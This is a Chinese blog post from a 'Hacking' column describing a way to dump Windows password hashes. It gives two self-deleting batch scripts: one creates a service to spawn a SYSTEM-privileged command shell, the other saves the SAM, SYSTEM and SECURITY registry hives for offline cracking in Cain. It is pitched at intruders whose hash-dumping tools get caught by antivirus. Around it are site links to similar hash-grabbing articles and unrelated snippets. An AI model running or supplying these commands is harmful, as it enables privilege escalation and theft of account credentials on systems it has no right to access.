另类抓win hash法

最新推荐文章于 2022-03-05 20:37:56 发布

7禧

最新推荐文章于 2022-03-05 20:37:56 发布

阅读量458

点赞数

分类专栏： Hacking 文章标签： access system cmd security xp delete

本文链接：https://blog.csdn.net/god_7z1/article/details/6587010

版权

Hacking 专栏收录该内容

264 篇文章 1 订阅

订阅专栏

看到了一篇文章，提到导出注册表永CAIN来破密码，这对很多抓hash的工具被杀了，自己又不会做免杀的大牛来说，是个福音，其实这个很早以前就有了，貌似是老外提出了的，只是没有引起注意。

作者说这个方法不是通杀的：

Windows 2000 SP4 (admin) = access denied
Windows XP SP2 (admin) = access denied
Windows XP SP3 (admin) = access denied
Windows 2003 R2 SP2 (admin) = works
Windows Vista SP2 (UAC/admin) = works
Windows 2008 SP1 (admin) = works
Windows 7 (UAC/admin) = works

对用户权限有要求，默认XP SP3是导出不了的，我本地测试了，但是system权限是可以的，那么咱可以创建一个system权限运行的CMD，然后再导出就OK了。

其他系统上面没有测试过，大家自己整吧。

首先创建一个系统权限执行的CMD：

======================StartSystemCmd.bat=========

sc Create systemcmd binPath= "cmd /K start" type= own type= interact
sc start systemcmd
sc delete systemcmd
del %0

=======================END=========================

然后导出文件。

==================SaveReg.bat=======================

@echo off
reg save hklm\sam sam.hive
reg save hklm\system system.hive
reg save hklm\security security.hive
del %0

=====================END============================

然后倒入到CAIN里面破吧。

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

7禧

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

(转)详解Windows Hash

Julia & Rust & Python

12-29

562

说明：此文有利于了解hash的一些制作原理。

获取windows hash的几种方式

lansefly1990的专栏

02-26

6975

一、windows hash介绍 NTML hash是指在windows系统下的Security Account Manager中保存的用户密码hash 该hash的生成方法：将明文口令转换成十六进制的格式；转换成Unicode格式，即在每个字节之后添加0x00；对Unicode字符串作MD4加密，生成32位的十六进制数字串；如测试测试密码为haha123 转成十六进制为：...

参与评论您还未登录，请先登录后发表或查看评论

【内网学习】3.windows hash抓取

gclome的博客

03-05

2518

目录 6.1 mimikatz 6.2 wce 6.3PwDump 6.4 Quarks PwDump 6.5 prcodump+mimikatz 6.6 注册表+mimikatz 6.7 LaZagne 1 mimikatz 工具下载地址：Releases · gentilkiwi/mimikatz · GitHub 在cmd的命令里输入 privilege::debug //提升权限 sekurlsa::logonpasswords //抓取密码结果如下，

Windows Hash介绍

include_heqile的博客

10-27

1108

文章目录Windows HashWindows中的身份认证KerberosWindows 域名解析 Windows Hash windows hash被截成两部分，LMhash和NTLMhash LMhash用于保存密码 LMhash采用MD4加密，主要是为了加快域内用户认证速度，但是这也导致了其安全性能降低，很容易被破解 LM在W7中是被禁用的，但是当密码的长度少于15个字符的时候，LM会被启用...

Windows系统Hash密码值知识

zero_295813128的专栏

07-17

8816

对入侵者来说，获取Windows的口令是整个攻击过程至关重要的一环，拥有系统原来用户的口令，将使得内网渗透和守控更加容易。Windows系统中的Hash密码值主要有LM-HASH以及NTLM-HASH值两部分构成，一旦入侵者获 ... 对入侵者来说，获取Windows的口令是整个攻击过程至关重要的一环，拥有系统原来用户的口令，将使得内网渗透和守控更加容易。Windows系统中的Has

入侵WIN2003 PHP服务器的另类技术

weixin_34395205的博客

11-27

179

1、disable_functions的突破在php -4.0.1以上的版本，php.ini里引入了一项功能disable_functions , 这个功能比较有用，可以用它禁止一些函数。比如在php.ini里加上disable_functions = passthru exec system popen 那么在执行这些函数的时候将会提示Warning...

***WIN2003 PHP服务器的另类技术

caiguazheng4921的博客

04-19

356

WPF另类实现摄像头录像并预览

5653325的专栏

02-09

2146

WPF中使用第三方控件来直接进行录像的控件没有找到（aforgenet好像不维护了？WPFMediaKit好像只能实现摄像头拍照。收费的控件没有使用，不做评论。）通过百度（感谢：https://www.cnblogs.com/giserlong88/p/11244779.html），确定了可以通过FFmpeg+Nginx+Vlc.DotNet.Wpf可以实现摄像头的录像保存、录像预览（有延时）...

另类走遍美国的生活语言：美国黑话英语大观(详解)

热门推荐

禅现缘起

07-19

3万+

文章来源: 生活是语言美国的黑人社会中的帮派问题经常地在绕舌歌曲中被讨论，自然也有许多与帮派相关的黑话会常在绕舌歌中出现，如： O.G. - 即Original Gangster，用来指有案底的帮派份子。 red rum - 就是谋杀 (murder) 的意思，只是这里把它反过来写。 Rolling 60s - 一黑帮的支派。 set - 帮派分支。 Set tripping - 帮派内斗。

hash算法概念和hash加盐法

社区之星的专栏

12-15

3229

hash算法简单介绍，以及hash加盐法的简单介绍

Hash冲突的解决：开放地址法和链地址法

木头人i

02-19

3908

什么是Hash冲突由于Hash原理是将输入空间的值映射到Hash空间内，但Hash值的空间远远小于输入的空间。根据鸽巢原理，一定会存在不同输入被映射成相同输出的过程，这种情况称为“散列碰撞（collision）”。在密码学中，散列函数必须具有不可逆性。作为一个好的Hash算法，我们需要这种冲突的概率尽可能小。鸽巢原理，又名狄利克雷抽屉原理、鸽笼原理。其中一种简单的表述法为：若有n个笼子...

窃取MSSQL各版本密码HASH

01-25

2万+

MSSQL使用自制的密码哈希算法对用户密码进行哈希，在内网渗透中，大多数服务口令都是一样的，收集MSSQL数据库的用户和密码可能会有用。01、MSSQL各版本密码HASHMSSQL 20...

Windows server 2012 用户hash抓取方法研究（本地+域）

Coisini的博客

06-16

2185

为避免文章过长，这里就不贴出详细测试过程了。经过我的测试，发现本地用户hash抓取的方法中，以下几种方式是可行的：注册表导出+cain Pwdump7.exe QuarksPwDump.exe mimikatz.exe 这几种方式都可以抓到本地用户hash,其中mimikatz.exe只能抓到登陆过的账户的hash值, 已经抓取不到明文的密码了，但是，有一些有意思的东西，直接上图：仔细看图...

Hash表的实现——拉链法

芒果就是没有盲的博客

11-21

3607

一.基础的概念问题 ·我们最常用的两种数据结构就是数组和链表，各自的优缺点很明确，对于数组来说，搜索某个下标位置的元素很快，但进行插入和删除操作就很慢，链表在内存中是离散存储的，查找具体某个元素比较慢，但插入删除操作很快。但是有时需要对大量数据进行查找以及插入删除操作，这时就需要用到哈希表，是根据关键码值(Key value)而直接进行访问的数据结构。 ·Hash我们百度一下英文意思就是把其弄乱，...

【重磅，更新！】2002-2021年中国31省份经济韧性测度三级指标数据合集（各省、市、企业等）

11-12

1、资源内容地址：https://blog.csdn.net/abc6838/article/details/143720369 2、数据特点：今年全新，手工精心整理，放心引用，数据来自权威，且标注《数据来源》，相对于其他人的控制变量数据准确很多,适合写论文做实证用，不会出现数据造假问题 3、适用对象：大学生，本科生，研究生小白可用，容易上手！！！ 4、课程引用: 经济学，地理学，城市规划与城市研究，公共政策与管理，社会学，商业与管理

CPPC++_更好的Windows字体渲染.zip

11-12

CPPC++_更好的Windows字体渲染

10018.doc

11-12

10018

在Windows capa中轻松创建虚拟显示.zip

11-12

cppc++

二环北路东段欣心家园小区商业B段(中石油加油站东邻).m4a

最新发布

11-12

二环北路东段欣心家园小区商业B段(中石油加油站东邻).m4a

线性探测法 hash c++代码

04-27

下面是一个简单的线性探测法哈希表的实现（C语言）： ```c #include <stdio.h> #include <stdlib.h> #include <string.h> #define TABLE_SIZE 1000 struct hash_node { char *key; char *value; }; struct hash_table { struct hash_node *table[TABLE_SIZE]; }; unsigned int hash_function(const char *key) { unsigned int hash = 0; int i; for (i = 0; i < strlen(key); i++) { hash += key[i]; hash += (hash << 10); hash ^= (hash >> 6); } hash += (hash << 3); hash ^= (hash >> 11); hash += (hash << 15); return hash % TABLE_SIZE; } struct hash_table *hash_create() { struct hash_table *hash = malloc(sizeof(struct hash_table)); int i; for (i = 0; i < TABLE_SIZE; i++) { hash->table[i] = NULL; } return hash; } void hash_destroy(struct hash_table *hash) { int i; for (i = 0; i < TABLE_SIZE; i++) { struct hash_node *node = hash->table[i]; if (node != NULL) { free(node->key); free(node->value); free(node); } } free(hash); } void hash_set(struct hash_table *hash, const char *key, const char *value) { unsigned int slot = hash_function(key); struct hash_node *node = hash->table[slot]; int i = 0; while (node != NULL) { if (strcmp(node->key, key) == 0) { free(node->value); node->value = strdup(value); return; } i++; slot = (slot + i) % TABLE_SIZE; node = hash->table[slot]; } node = malloc(sizeof(struct hash_node)); node->key = strdup(key); node->value = strdup(value); hash->table[slot] = node; } char *hash_get(struct hash_table *hash, const char *key) { unsigned int slot = hash_function(key); struct hash_node *node = hash->table[slot]; int i = 0; while (node != NULL) { if (strcmp(node->key, key) == 0) { return node->value; } i++; slot = (slot + i) % TABLE_SIZE; node = hash->table[slot]; } return NULL; } int main() { struct hash_table *hash = hash_create(); hash_set(hash, "name", "John"); hash_set(hash, "age", "30"); printf("Name: %s, Age: %s\n", hash_get(hash, "name"), hash_get(hash, "age")); hash_destroy(hash); return 0; } ``` 这个哈希表使用了一个简单的哈希函数，可以根据需要进行修改。在这个哈希表中，冲突的时候使用了线性探测法来解决。